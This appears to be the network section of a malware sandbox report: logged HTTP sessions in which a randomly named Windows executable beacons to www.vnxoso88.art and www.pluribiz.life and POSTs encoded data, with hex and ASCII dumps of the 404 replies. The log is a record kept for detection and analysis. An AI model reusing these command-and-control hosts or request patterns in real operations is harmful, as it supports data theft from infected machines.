                                                                                        Nov 6, 2024 16:00:26.714237928 CET424INData Raw: 83 68 d4 e5 a8 4c d6 01 25 89 6b 41 6a a7 d5 fc 34 aa 15 52 75 e1 96 4e 0b a6 5b a4 b4 75 92 96 f3 4d a4 51 6d c6 cc 4e 3a 04 39 c6 aa ac f9 19 34 a7 72 8c e1 08 4f 70 4a ef 18 74 82 b6 d2 76 71 2d 1a f3 6d a1 97 e0 70 c5 f0 c8 c2 3f 4b 71 61 e9
                                                                                        Data Ascii: hL%kAj4RuN[uMQmN:94rOpJtvq-mp?KqaT1&5Pr<Cj2P IW;:@.7&v 3MAh\3 C},8MkW0[s*vs,:)$Jxs"+qhEKbhK[;xa~PER
                                                                                        Nov 6, 2024 16:00:26.714268923 CET888INData Raw: 5e d2 68 b5 1a 53 b0 b0 b3 9c c6 c3 c6 42 a7 9a 6a 30 4e 21 f9 40 d7 ba e2 c3 a2 4d 6c cc 84 da 1c 56 48 4e 33 0a 33 da 44 f4 9e 42 a3 33 e5 f1 d9 50 b1 90 82 d6 4c 83 9a 69 fc 06 e4 be 88 b6 2c 2f d5 d5 70 cb 0b a2 ca b2 7b 3b ed f2 40 e2 55 35
                                                                                        Data Ascii: ^hSBj0N!@MlVHN33DB3PLi,/p{;@U5xJ-8Rmz;p[[)08(ZLfC?=ne?z;+=~+Z7ZKE|?w>:a3c,X^/s@=T^+L}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.84972066.29.146.14805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:28.603564978 CET378OUTGET /d26j/?A60d=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3m5Pan90DEVx2dAgRBkFBhEuf5ZPCqUAEh8OTzHmZFBqDA==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.vnxoso88.art
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:00:29.261261940 CET1236INHTTP/1.1 404 Not Found
                                                                                        keep-alive: timeout=5, max=100
                                                                                        content-type: text/html
                                                                                        transfer-encoding: chunked
                                                                                        date: Wed, 06 Nov 2024 15:00:29 GMT
                                                                                        server: LiteSpeed
                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                        connection: close
                                                                                        Data Raw: 32 37 37 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                        Data Ascii: 2775<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                        Nov 6, 2024 16:00:29.261280060 CET212INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                        Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info {
                                                                                        Nov 6, 2024 16:00:29.261300087 CET1236INData Raw: 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20
                                                                                        Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0;
                                                                                        Nov 6, 2024 16:00:29.261312962 CET1236INData Raw: 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20
                                                                                        Data Ascii: fo-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img {
                                                                                        Nov 6, 2024 16:00:29.261339903 CET424INData Raw: 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b
                                                                                        Data Ascii: er address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
                                                                                        Nov 6, 2024 16:00:29.261351109 CET1236INData Raw: 41 44 71 43 41 4d 41 41 41 43 72 78 6a 68 64 41 41 41 41 74 31 42 4d 56 45 55 41 41 41 41 41 41 41 44 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                                                                                        Data Ascii: ADqCAMAAACrxjhdAAAAt1BMVEUAAAAAAAD////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////5+fn////////////////////////////////6+vr/////////////
                                                                                        Nov 6, 2024 16:00:29.261363983 CET1236INData Raw: 30 53 6f 2b 68 57 6d 69 36 31 4e 6e 33 61 71 4b 47 45 7a 44 66 46 72 6d 45 6f 4b 71 63 57 53 46 44 52 4f 4e 53 72 41 55 30 69 46 59 4c 72 48 55 32 52 4b 42 33 71 2b 48 78 44 48 54 34 4a 4b 45 65 32 70 72 68 78 59 31 61 43 53 35 6c 59 2b 48 6e 58
                                                                                        Data Ascii: 0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY+HnXu6N+x6IJCRQQmEEz+YjIE/xs/MmD8qHRYK5CAHuaTY5jfQxFC/YoIQSSVafrD+WK4H0Piv8SATRZChEXiOs39L/IYwiOxRHgeEKcmbMI9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7
                                                                                        Nov 6, 2024 16:00:29.261375904 CET424INData Raw: 31 2b 58 64 52 50 52 61 4d 30 6b 36 34 6a 4c 31 4c 45 46 6b 42 42 47 52 77 37 61 64 31 5a 45 2b 41 56 48 37 34 58 68 38 4e 51 4d 2f 64 5a 4d 78 56 4b 44 6b 50 43 79 57 6d 62 50 4a 2f 38 75 49 51 4a 2f 58 62 69 4c 38 62 4e 4b 76 76 30 76 57 6c 4c
                                                                                        Data Ascii: 1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICMGXIAX3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjn
                                                                                        Nov 6, 2024 16:00:29.261457920 CET1236INData Raw: 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d 75 73 6c 70 57 44 55 54 64 59 61 62 34 4c 32
                                                                                        Data Ascii: URFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGX
                                                                                        Nov 6, 2024 16:00:29.261471987 CET1236INData Raw: 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                        Data Ascii: } .status-reason { font-size: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code"
                                                                                        Nov 6, 2024 16:00:29.266565084 CET619INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 73 65 72 76 65 72 22 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <li class="info-server"></li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://cpanel.com/?utm_sourc


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.849721209.74.64.58805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:34.495141983 CET636OUTPOST /afcr/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.pluribiz.life
                                                                                        Origin: http://www.pluribiz.life
                                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 58 46 37 31 71 64 76 37 6b 45 47 48 5a 6e 70 57 48 61 34 4e 35 52 77 36 6e 31 49 57 53 6f 33 6c 79 6d 4f 6e 77 2f 74 61 36 78 30 57 4f 65 47 75 54 43 4b 75 79 76 44 2f 69 64 77 33 30 6e 46 56 69 6d 4a 71 6e 35 72 59 4b 42 50 76 30 69 6c 46 48 65 55 2f 37 62 47 41 6c 32 70 2f 4b 75 70 34 37 42 4b 36 79 78 70 76 69 33 54 64 78 48 4a 30 71 61 37 64 79 56 31 37 31 37 68 36 49 78 50 37 45 56 6f 2b 34 4c 6c 4d 35 74 35 75 59 6e 48 6b 56 6b 67 39 66 79 4c 6d 6b 66 6a 73 6e 36 36 59 43 4c 69 57 68 64 50 66 4a 69 66 59 55 47 48 49 59 4b 46 55 69 4f 37 42 47 34 63 3d
                                                                                        Data Ascii: A60d=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/idw30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7EVo+4LlM5t5uYnHkVkg9fyLmkfjsn66YCLiWhdPfJifYUGHIYKFUiO7BG4c=
                                                                                        Nov 6, 2024 16:00:35.159296989 CET533INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:00:35 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.849722209.74.64.58805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:37.062380075 CET656OUTPOST /afcr/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.pluribiz.life
                                                                                        Origin: http://www.pluribiz.life
                                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 37 66 6c 79 43 4b 6e 7a 36 42 61 33 52 30 57 61 4f 47 76 4c 69 4b 70 79 76 4f 4b 69 59 49 33 30 6e 52 56 69 69 4e 71 6e 49 72 66 49 52 50 68 37 43 6b 6a 4b 2b 55 2f 37 62 47 41 6c 77 46 52 4b 75 78 34 36 78 36 36 79 54 4e 73 38 6e 54 53 34 6e 4a 30 75 61 37 52 79 56 30 63 31 2b 64 63 49 33 4c 37 45 58 67 2b 34 5a 64 4e 7a 74 34 6e 47 58 48 79 64 6e 42 78 57 56 54 4a 6f 38 50 54 70 72 47 4c 4f 64 54 38 37 2f 48 5a 4b 69 33 7a 55 46 76 2b 64 39 59 38 34 74 72 78 59 76 4a 51 67 4e 35 52 57 57 71 5a 43 72 30 75 30 6f 4c 6b 48 73 50 68
                                                                                        Data Ascii: A60d=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS7flyCKnz6Ba3R0WaOGvLiKpyvOKiYI30nRViiNqnIrfIRPh7CkjK+U/7bGAlwFRKux46x66yTNs8nTS4nJ0ua7RyV0c1+dcI3L7EXg+4ZdNzt4nGXHydnBxWVTJo8PTprGLOdT87/HZKi3zUFv+d9Y84trxYvJQgN5RWWqZCr0u0oLkHsPh
                                                                                        Nov 6, 2024 16:00:37.707505941 CET533INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:00:37 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.849723209.74.64.58805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:39.699631929 CET1673OUTPOST /afcr/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.pluribiz.life
                                                                                        Origin: http://www.pluribiz.life
                                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 39 48 6c 79 52 43 6e 70 64 56 61 32 52 30 57 5a 4f 47 69 4c 69 4c 31 79 72 69 52 69 59 4e 49 30 6c 70 56 7a 78 46 71 68 38 2f 66 43 52 50 68 2b 79 6b 33 48 65 55 71 37 62 32 45 6c 77 31 52 4b 75 78 34 36 33 2b 36 69 52 70 73 2b 6e 54 64 78 48 49 37 71 61 36 4f 79 56 74 6a 31 2f 4e 71 49 48 72 37 45 33 77 2b 36 71 6c 4e 2f 74 34 70 48 58 47 78 64 6e 4d 7a 57 52 7a 2f 6f 39 37 35 70 73 69 4c 4c 35 43 39 75 2b 7a 2b 64 42 48 6c 53 32 4c 4b 57 4d 78 63 2b 4d 33 31 53 64 56 7a 6e 4c 39 34 41 51 32 46 4b 35 56 31 33 75 33 2b 4e 62 2b 53 32 55 54 51 63 57 75 66 36 45 52 70 69 48 62 7a 6d 61 57 44 65 5a 77 52 6c 48 35 30 48 69 4c 39 56 79 67 50 43 4f 69 57 54 5a 6f 66 73 33 44 57 31 74 68 4e 50 57 64 77 62 68 77 61 42 5a 46 51 39 4d 44 38 7a 53 6a 49 64 59 49 4b 42 53 39 32 65 43 72 50 62 4e 6d 78 2f 46 2f 4b 49 4f 68 61 54 45 2f 31 53 51 31 78 39 77 59 30 32 64 4a 65 2f [TRUNCATED]
                                                                                        Data Ascii: A60d=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS9HlyRCnpdVa2R0WZOGiLiL1yriRiYNI0lpVzxFqh8/fCRPh+yk3HeUq7b2Elw1RKux463+6iRps+nTdxHI7qa6OyVtj1/NqIHr7E3w+6qlN/t4pHXGxdnMzWRz/o975psiLL5C9u+z+dBHlS2LKWMxc+M31SdVznL94AQ2FK5V13u3+Nb+S2UTQcWuf6ERpiHbzmaWDeZwRlH50HiL9VygPCOiWTZofs3DW1thNPWdwbhwaBZFQ9MD8zSjIdYIKBS92eCrPbNmx/F/KIOhaTE/1SQ1x9wY02dJe/nuLHaWilGqd+SbLUthSIle0H0oCLrQP3D/EbDEpilBjhgYH+BTTyAOxaV9f5qrwtI69BCg9sqpCf10C/Tb+g1NDtGWPv18KZ6t0FDU/0+yxQsPhsta0fVg05fwVtfVuc4flW0e93idYYWmakLHucFptaGDM2VQap40rNjdoUK9q1byuK0vZgnSSpV44pOTUiLq3gUyoN498y7F8n1bL9/HOKbs2+7moBUv52r4/rqHYLvoETSyPZlli5c+FDHRi36EgGya4QtTqpJX273psGzRAa1ngERkZ/+bHX9hxhtiDR0KEND8ZIWG9nZzVjvrlpZWULnbD1s46O9H6hSnkkGceEty65RTEiyHk60oQcJLfHPZtmHka6IDZTmuTmfSUPKZy0jxT7PEy4vYh9ZG1dg9lsrCO7HXadWiS+DB2tKpeJPhE2Fnct2SVgec2GVX0t0SCnN2Ma8vXBvjtAqjAEABmeY/Jm9xUUz6Ap37zZMUiSjuHe0g/aJxiJEeONkQSsjvVy82pnDmp7knGs1jIGeB5wjMFW1A01Bbl7pWkIMG45a6YVYCNgJm+6pWF8cLnPlF32SN5ZNLoMK5BQH72xuHqm6TvE5FqHr7BRLGxe/Kn1BEvtjFzKGUOFfNM3cbQDe8PXUtyotjDQBje1AhfDXvUlCiCfEfG+1X [TRUNCATED]
                                                                                        Nov 6, 2024 16:00:40.305983067 CET533INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:00:40 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.849724209.74.64.58805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:42.233305931 CET379OUTGET /afcr/?QftlZ=CnaPg8j&A60d=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8ACfrzzZPLOA7u6erlXN+FNsi+iqdwi1J/UOdsVhZq9rVpg== HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.pluribiz.life
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:00:42.892618895 CET548INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:00:42 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
